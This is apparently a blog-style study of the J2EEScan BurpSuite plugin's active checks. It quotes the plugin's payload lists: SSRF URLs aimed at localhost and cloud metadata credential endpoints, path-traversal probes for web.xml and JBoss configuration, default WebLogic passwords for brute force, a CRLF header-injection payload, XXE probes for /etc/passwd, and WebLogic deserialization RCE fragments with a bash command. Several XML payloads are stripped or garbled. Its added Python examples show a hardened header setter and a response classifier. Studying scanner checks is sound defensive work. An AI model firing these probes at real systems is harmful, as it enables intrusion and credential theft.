Plugin development study, set 11. Previous articles:
[BurpSuite] Plugin Development Study: Log4shell
[BurpSuite] Plugin Development Study: Software Vulnerability Scanner
[BurpSuite] Plugin Development Study: dotnet-Beautifier
[BurpSuite] Plugin Development Study: active-scan-plus-plus
[BurpSuite] Plugin Development Study: J2EEScan (Part 1) - Passive Scanning
[BurpSuite] Plugin Development Study: J2EEScan (Part 2) - Active Scanning (1-10)
[BurpSuite] Plugin Development Study: J2EEScan (Part 2) - Active Scanning (11-20)
[BurpSuite] Plugin Development Study: J2EEScan (Part 2) - Active Scanning (21-30)
[BurpSuite] Plugin Development Study: J2EEScan (Part 2) - Active Scanning (31-40)
[BurpSuite] Plugin Development Study: J2EEScan (Part 2) - Active Scanning (41-50)
[BurpSuite] Plugin Development Study: J2EEScan (Part 2) - Active Scanning (51-60)
Address:
private static final List<byte[]> SSRF_INJECTION_TESTS = Arrays.asList(
"gopher://localhost:22/".getBytes(),
"http://[::]:22/".getBytes(),
"ftp://[::]:22/".getBytes(),
"ftp://localhost:22/".getBytes(),
"ftp://0.0.0.0:22/".getBytes(),
"ftp://0177.0000.0000.0001:22".getBytes(),
"ftp://0x7f.1:22/".getBytes(),
"http://spoofed.burpcollaborator.net:22/".getBytes()
);
These target the local port 22.
The match is:
private static final byte[] GREP_STRING = "OpenSSH".getBytes();
Next comes access to the various cloud metadata endpoints:
private static final Map<byte[], Pattern> SSRF_CLOUD_INJECTION_TESTS = new HashMap<byte[], Pattern>() {
{
put("http://169.254.169.254/latest/meta-data/".getBytes(), Pattern.compile("identity-credentials", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
put("http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token".getBytes(), Pattern.compile("token_type", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
}
};
The comments here list a few cases:
*
* Source AWS
* http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
*
* http://169.254.169.254/latest/user-data
* http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLENAME]
* http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLENAME]
* http://169.254.169.254/latest/meta-data/ami-id
* http://169.254.169.254/latest/meta-data/reservation-id
* http://169.254.169.254/latest/meta-data/hostname
* http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
* http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
*
* # AWS - Dirs http://169.254.169.254/
* http://169.254.169.254/latest/meta-data/
* http://169.254.169.254/latest/meta-data/public-keys/
*
There are also plenty of summaries online:
http://cn-sec.com/archives/840191.html
payload
private static final List<String> STATUS_SERVLET_PATHS = Arrays.asList(
"/status?full=true",
"/web-console/status?full=true",
"/server-status?full=true"
);
If the response is a 401:
if (statusInfo.getStatusCode() == 401) {
it is treated as a login endpoint,
and a weak-password test follows:
WeakPasswordBruteforcer br = new WeakPasswordBruteforcer();
If a 200 is matched and the response contains one of the following, it indicates service information disclosure of the corresponding type:
private static final byte[] GREP_STRING_J2EE = "Status Servlet".getBytes();
private static final byte[] GREP_STRING_HTTPD = "Apache Server Status".getBytes();
Tomcat management console exposure; quite common by now.
private static final List<String> TOMCAT_HOST_MANAGER_PATHS = Arrays.asList(
"/host-manager/html?j2eescan"
);
Brute force
Same as in 63.
private static final List<String> TOMCAT_MANAGER_PATHS = Arrays.asList(
"/manager/html"
);
JBoss issue
payload
private static final List<String> JBOSS_PATHS = Arrays.asList(
"/..\\\\standalone\\\\configuration\\\\standalone.xml"
);
The match is on the XML that gets read:
private static final List<byte[]> GREP_STRINGS = Arrays.asList(
".getBytes()
);
Unauthenticated access to Tomcat
private static final List<String> TOMCAT_URI_NORMALIZATIONS = Arrays.asList(
"..;/manager/html",
"..;/"
);
Looks familiar: Shiro's auth bypass uses the same trick.
Looks like another CRLF.
payload
private static final byte[] INJ = "%E5%98%8A%E5%98%8DX-Injection:%20test".getBytes();
Match on the response:
if (getResponseHeaderValue(responseInfo, "X-Injection") != null) {
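Why that payload is a CRLF test: the two percent-encoded characters decode to U+560A and U+560D, whose low byte is 0x0A / 0x0D, so a server that narrows code points to single bytes ends up with a line break inside the header. Added example, not J2EEScan code; `narrow_to_byte` models that lossy narrowing and `set_header` is a hypothetical hardened header setter.

```python
import re
from urllib.parse import unquote

# Payload from the J2EEScan CRLF check discussed above.
INJ = "%E5%98%8A%E5%98%8DX-Injection:%20test"

def narrow_to_byte(text: str) -> bytes:
    """Model a server that keeps only the low byte of each code point.
    This is the lossy narrowing the payload relies on; it is shown
    only to illustrate, never as a real conversion."""
    return bytes(ord(ch) & 0xFF for ch in text)

def injected_headers(payload: str) -> list:
    """Decode the payload as an application would, apply the narrowing,
    and return the header lines smuggled in after the CR/LF."""
    decoded = unquote(payload)        # '\u560a\u560dX-Injection: test'
    raw = narrow_to_byte(decoded)     # b'\n\rX-Injection: test'
    parts = re.split(rb"[\r\n]+", raw)
    # Everything after the first line break is an injected header.
    return [p.decode("latin-1") for p in parts[1:] if p]

def safe_header_value(value: str) -> str:
    """Allow only printable ASCII (0x20..0x7E). This rejects CR/LF
    directly and also rejects U+560A/U+560D before any downstream
    component can narrow them to control bytes."""
    if not all(0x20 <= ord(ch) < 0x7F for ch in value):
        raise ValueError("header value must be printable ASCII")
    return value

def set_header(headers: dict, name: str, value: str) -> dict:
    """Hypothetical hardened setter: validate, then store."""
    headers[name] = safe_header_value(value)
    return headers

if __name__ == "__main__":
    print(injected_headers(INJ))      # ['X-Injection: test']
    try:
        set_header({}, "Location", unquote(INJ))
    except ValueError as exc:
        print("rejected:", exc)
```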
payload
private static final List<String> WEBINF_PATHS = Arrays.asList(
"/WEB-INF./web.xml",
"//WEB-INF/web.xml",
"/WEB-INF/web.xml",
"/static/WEB-INF/web.xml", // CVE-2014-0053
"/forward:/WEB-INF/web.xml", // spring issue
"/web-inf./web.xml", // CVE-2016-0793 https://bugzilla.redhat.com/show_bug.cgi?id=1305937
"/.//WEB-INF/web.xml",
"/./WEB-INF/web.xml"
);
match
private static final byte[] GREP_STRING = ".getBytes();
For arbitrary file read, files like these are also worth trying.
Login endpoint path
private static final List<String> WEBLOGIC_CONSOLE_PATHS = Arrays.asList(
"/console/login/LoginForm.jsp;ADMINCONSOLESESSION=TynPs0LnRt9BLctc13WMYmhQpsp3cG1LCNDp78TJyDfHMWhC4Kln!1225542286"
);
match
private static final List<byte[]> GREP_WEBLOGIC_STRINGS = Arrays.asList(
"BEA WebLogic Server Administration Console".getBytes(),
"Oracle WebLogic Server Administration Console".getBytes(),
"WebLogic Server".getBytes()
);
indicates brute force may be possible,
and then the brute force starts:
List<Map.Entry<String, String>> credentials = new ArrayList<>();
credentials.add(new AbstractMap.SimpleEntry<>("weblogic", "weblogic"));
credentials.add(new AbstractMap.SimpleEntry<>("weblogic", "weblogic1"));
credentials.add(new AbstractMap.SimpleEntry<>("weblogic", "weblogic01"));
credentials.add(new AbstractMap.SimpleEntry<>("weblogic", "welcome1"));
Fairly crude: only four weak passwords and a single account are tried.
Problem path
private static final List<String> ASYNC_PATHS = Arrays.asList(
"/_async/AsyncResponseService"
);
payload
String serializedRce = " "
+ ""
+ "ONRaJntRjNYBc3MJW2JC "
+ "42PlWZ15ODi1hQ3pQ5Ol "
+ ""
+ ""
+ ""
+ ""
+ "/bin/bash "
+ ""
+ ""
+ "-c "
+ ""
+ ""
+ "ping -c 3 %s "
+ ""
+ ""
+ " "
+ ""
+ ""
+ ""
+ " "
+ "";
// Collaborator context
This is an RCE; it probably sees a lot of use in HW exercises.
This one has even more paths to try:
private static final List<String> WLS_WSAT_PATHS = Arrays.asList(
"/wls-wsat/CoordinatorPortType",
"/wls-wsat/CoordinatorPortType11",
"/wls-wsat/ParticipantPortType",
"/wls-wsat/ParticipantPortType11",
"/wls-wsat/RegistrationPortTypeRPC",
"/wls-wsat/RegistrationPortTypeRPC11",
"/wls-wsat/RegistrationRequesterPortType",
"/wls-wsat/RegistrationRequesterPortType11"
);
payload
String serializedRce = ""
+ ""
+ ""
+ " "
+ " "
+ " http://%s "
+ " "
+ " "
+ " "
+ " "
+ " "
+ ""
+ ""
+ " "
+ "";
This is also an RCE.
Path
private static final List<String> UDDI_PATHS = Arrays.asList(
"/uddiexplorer/"
);
If any of these are matched:
private static final List<byte[]> GREP_SSRF_STRINGS = Arrays.asList(
"could not connect over HTTP to server:".getBytes(),
"XML_SoapException: Connection refused".getBytes(),
"XML_SoapException: Received a response from url".getBytes()
);
it indicates an SSRF.
Vulnerability path
private static final List<String> WS_TEST_PAGES = Arrays.asList(
"/ws_utc/config.do"
);
match
private static final List<byte[]> GREP_STRINGS = Arrays.asList(
"settings ".getBytes()
);
then the vulnerability is present.
Payload, all in one go:
private static final List<byte[]> XINCLUDE_INJ_TESTS = Arrays.asList(
"" .getBytes());
payload
private static final String XXE_DTD_DEFINITION = "]>";
This one is echo-based; it looks like a general-purpose check.
payload
private static final List<byte[]> XXE_INJECTION_TESTS = Arrays.asList(
"]>&xxe; ".getBytes(),
// https://twitter.com/Agarri_FR/status/656440244116574208
" %dtd;]> ]]>".getBytes()
);
Same thing.
One goes through an external DTD, the other parses and echoes directly.
match
private static final List<Pattern> XXE_RE_MATCHES = Arrays.asList(
Pattern.compile("root:.*:0:[01]:", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE),
Pattern.compile("file not found", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE),
Pattern.compile("java\\.io\\.FileNotFoundException", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
But for the DTD route, file is usually not used for testing; HTTP is more common and can hit a DNSlog.
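The checks on this page share one shape: a fixed request, then a substring or regex match on the response (the OpenSSH banner, the AWS/GCP metadata patterns, the Status Servlet and WebLogic console strings, the UDDI SSRF errors, the X-Injection header, and the XXE regexes above). The following added example, not J2EEScan code, mirrors that match logic in Python over constructed sample responses so the detection side can be read on its own; the mapping of Java's CASE_INSENSITIVE|DOTALL|MULTILINE to re.I|re.S|re.M is assumed, and only the Status Servlet check is gated on a 200, as the page describes.

```python
import re

_FLAGS = re.I | re.S | re.M  # Java CASE_INSENSITIVE | DOTALL | MULTILINE

# Substring checks taken from the page: finding -> (required status, needles).
GREP_CHECKS = {
    "ssrf-port-22":     (None, [b"OpenSSH"]),
    "status-servlet":   (200,  [b"Status Servlet", b"Apache Server Status"]),
    "weblogic-console": (None, [b"BEA WebLogic Server Administration Console",
                                b"Oracle WebLogic Server Administration Console",
                                b"WebLogic Server"]),
    "uddi-ssrf":        (None, [b"could not connect over HTTP to server:",
                                b"XML_SoapException: Connection refused",
                                b"XML_SoapException: Received a response from url"]),
}

# Regex checks taken from the page. Note that "file not found" is a very
# generic string and is the most likely of these to produce false positives.
REGEX_CHECKS = {
    "aws-metadata": re.compile(rb"identity-credentials", _FLAGS),
    "gcp-metadata": re.compile(rb"token_type", _FLAGS),
    "xxe-passwd":   re.compile(rb"root:.*:0:[01]:", _FLAGS),
    "xxe-error":    re.compile(rb"file not found|java\.io\.FileNotFoundException", _FLAGS),
}

def classify_response(status: int, headers: dict, body: bytes) -> list:
    """Return the finding names the page's checks would raise for one
    response. The header check is the CRLF one: an X-Injection header
    coming back means the injected line was honoured."""
    findings = []
    if any(name.lower() == "x-injection" for name in headers):
        findings.append("crlf-injection")
    for name, (want_status, needles) in GREP_CHECKS.items():
        if want_status is not None and status != want_status:
            continue
        if any(needle in body for needle in needles):
            findings.append(name)
    for name, pattern in REGEX_CHECKS.items():
        if pattern.search(body):
            findings.append(name)
    return findings

if __name__ == "__main__":
    # Constructed sample responses, not captured traffic.
    print(classify_response(200, {}, b"SSH-2.0-OpenSSH_8.9p1\r\n"))
    print(classify_response(200, {}, b"root:x:0:0:root:/root:/bin/bash\n"))
    print(classify_response(401, {}, b"Status Servlet"))  # gated on 200 -> []
```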